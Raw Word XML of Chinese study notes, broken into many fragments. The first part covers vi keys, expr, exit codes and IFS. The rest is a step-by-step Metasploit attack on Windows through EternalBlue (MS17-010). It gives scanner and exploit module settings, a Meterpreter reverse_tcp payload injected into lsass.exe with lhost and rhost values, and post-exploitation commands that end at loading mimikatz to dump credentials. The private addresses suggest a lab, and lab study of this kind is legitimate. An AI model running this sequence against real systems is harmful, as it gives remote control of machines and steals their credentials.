    <w:p w:rsidR="00566A91" w:rsidRPr="00CB0A92" w:rsidRDefault="00566A9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k</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：上移一行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401477" w:rsidRPr="00CB0A92" w:rsidRDefault="00566A9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l</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：右移一个字符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x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：删除字符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dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：删除行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dw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：删除单词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ds</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：删除现在到行末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u</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：撤销</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00312019" w:rsidRPr="00CB0A92" w:rsidRDefault="00312019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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：在当前光标后追加数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00566A91" w:rsidRPr="00CB0A92" w:rsidRDefault="00401477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q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>！：不修改退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00566A91" w:rsidRPr="00CB0A92" w:rsidRDefault="00566A91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wq</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001826EA" w:rsidRPr="0022728A" w:rsidRDefault="001826EA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宋体" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>算数运算</w:t>
      </w:r>
      <w:r w:rsidR="0044579F" w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>expr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001826EA" w:rsidRDefault="003B6B94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lastRenderedPageBreak/>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要转义操作符</w:t>
      </w:r>
      <w:r w:rsidR="008D762B" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00096FF2" w:rsidRPr="00CB0A92" w:rsidRDefault="00096FF2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数学运算只能算整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00023A40" w:rsidRPr="0022728A" w:rsidRDefault="00023A40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linux</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>退出状态码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00697AF8" w:rsidRPr="00CB0A92" w:rsidRDefault="006657DB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echo $?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E44F0" w:rsidRPr="0022728A" w:rsidRDefault="00A55CD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文件比较</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00001D68" w:rsidRDefault="00001D6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001D68" w:rsidRDefault="00001D6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001D68" w:rsidRDefault="00001D6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001D68" w:rsidRDefault="00001D68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8E44F0" w:rsidRPr="00CB0A92" w:rsidRDefault="008E44F0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2774315" cy="1476509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47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F0" w:rsidRPr="00CB0A92" w:rsidRDefault="008E44F0" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E44F0" w:rsidRPr="0022728A" w:rsidRDefault="00223BE4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b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IFS</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223BE4" w:rsidRPr="00CB0A92" w:rsidRDefault="00297A30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Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的环境变量，也叫内部字段分隔符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25F92" w:rsidRPr="00CB0A92" w:rsidRDefault="00F25F92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F25F92" w:rsidRPr="00CB0A92" w:rsidRDefault="00F25F92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IFS=$’\n’:;”</w:t>
      </w:r>
      <w:r w:rsidR="002F0E5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>多个分隔符</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25F92" w:rsidRPr="00CB0A92" w:rsidRDefault="00F25F92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</w:p>
    <w:p w:rsidR="00297A30" w:rsidRPr="00CB0A92" w:rsidRDefault="00297A30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IFS.OLD=$IFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297A30" w:rsidRPr="00CB0A92" w:rsidRDefault="00297A30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IFS=$’\n’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B06DA" w:rsidRPr="00CB0A92" w:rsidRDefault="004B06DA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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后续代码，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>恢复默认</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297A30" w:rsidRPr="00CB0A92" w:rsidRDefault="00297A30" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="150" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IFS=$IFS.OLD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F2595" w:rsidRDefault="005D1B33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给文件授权：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1B33" w:rsidRDefault="005D1B33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mod -R 777 /</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1B33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>50_test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1B33" w:rsidRDefault="005D1B33" w:rsidP="002B35D0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lastRenderedPageBreak/>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>50_test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下所有文件授权</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA17FC" w:rsidRDefault="00FA17FC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FA17FC" w:rsidRDefault="00F90AD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:rsidR="00F90ADD" w:rsidRDefault="00F90AD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:rsidR="00F90ADD" w:rsidRDefault="00F90AD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:rsidR="00F90ADD" w:rsidRDefault="00F90AD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Meatsploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D243BA" w:rsidRDefault="00950149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永恒之蓝</w:t>
      </w:r>
      <w:r w:rsidR="00C82AEA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>+win7[32]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00375972" w:rsidRDefault="00375972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45---</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>永恒之蓝漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC2C5B" w:rsidRDefault="00AC2C5B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 xml:space="preserve">search  ms17-010 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>搜索漏洞模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C531FA" w:rsidRDefault="00C531FA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reload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>重载模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF7F3A" w:rsidRDefault="00CF7F3A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需要下载：</w:t>
      </w:r>
      <w:r w:rsidR="000300F8" w:rsidRPr="000300F8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Eternalblue-Doublepulsar-Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="000300F8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后做：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000300F8" w:rsidRDefault="000300F8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将</w:t>
      </w:r>
      <w:r w:rsidRPr="000300F8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>eternalblue_doublepulsar.rb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="000300F8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/metasploit-framework/modules/exploits/windows/smb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000300F8" w:rsidRDefault="00CE14CA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将</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE14CA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Eternalblue-Doublepulsar-Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件夹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE14CA" w:rsidRDefault="004F34C0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探测阶段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F34C0" w:rsidRDefault="004F34C0" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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E10A4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>use auxiliary/scanner/smb/s</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10A4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mb_ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F34C0" w:rsidRDefault="004F34C0" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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E10A4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set rhosts 192.168.5.90</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F34C0" w:rsidRPr="00E10A4D" w:rsidRDefault="004F34C0" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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E10A4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F34C0" w:rsidRPr="00E12444" w:rsidRDefault="004F34C0" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="150" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12444">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>显示是否有永恒漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F34C0" w:rsidRDefault="004F34C0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攻击阶段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B7A11" w:rsidRDefault="004B7A1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4B7A11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms17_010_eternalblue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8615C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/eternalblue_doublepulsar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B7A11" w:rsidRDefault="004B7A1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上面两个模块不一致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DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps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ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps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PROCESSINJECT lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C1410" w:rsidRPr="003F087B" w:rsidRDefault="009C1410" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="350" w:firstLine="840"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F087B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>也有</w:t>
      </w:r>
      <w:r w:rsidRPr="003F087B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>explorer.exe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TARGETARCHITECTURE x64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008615C1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lastRenderedPageBreak/>
        <w:t>set rhost 192.168.1.9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002720D8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2720D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set payload windows/me</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008615C1" w:rsidRDefault="008615C1" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002720D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>terpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008615C1" w:rsidRPr="002720D8" w:rsidRDefault="008615C1" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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2720D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008615C1" w:rsidRPr="009C1410" w:rsidRDefault="008615C1" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1410">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目标是</w:t>
      </w:r>
      <w:r w:rsidRPr="009C1410">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>win7.64</w:t>
      </w:r>
      <w:r w:rsidRPr="009C1410">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2346" w:rsidRDefault="004F34C0" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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payload windows/x64/met</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F34C0" w:rsidRDefault="004F34C0" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine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erpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00133E44" w:rsidRDefault="00133E44" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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PROCESSINJECT lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F34C0" w:rsidRDefault="004F34C0" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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lhost 192.168.5.42</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F34C0" w:rsidRDefault="004F34C0" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set rhosts 192.168.5.90</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F34C0" w:rsidRPr="009C1410" w:rsidRDefault="004F34C0" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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9C1410">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F34C0" w:rsidRDefault="004F34C0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4F34C0" w:rsidRPr="000300F8" w:rsidRDefault="004F34C0" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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8D0886" w:rsidRDefault="00891039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win 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C82AEA" w:rsidRDefault="00CF7F3A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 w:rsidRPr="00CF7F3A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A65F5" w:rsidRDefault="001A65F5" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="831" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B4768" w:rsidRDefault="005B4768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攻破后</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B4768" w:rsidRDefault="005B4768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首先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>session 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B4768" w:rsidRDefault="005B4768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getuid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B4768" w:rsidRDefault="005B4768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screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B4768" w:rsidRDefault="005B4768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 w:rsidRPr="005B4768">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">load mimkatz  </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4768">
        <w:rPr>
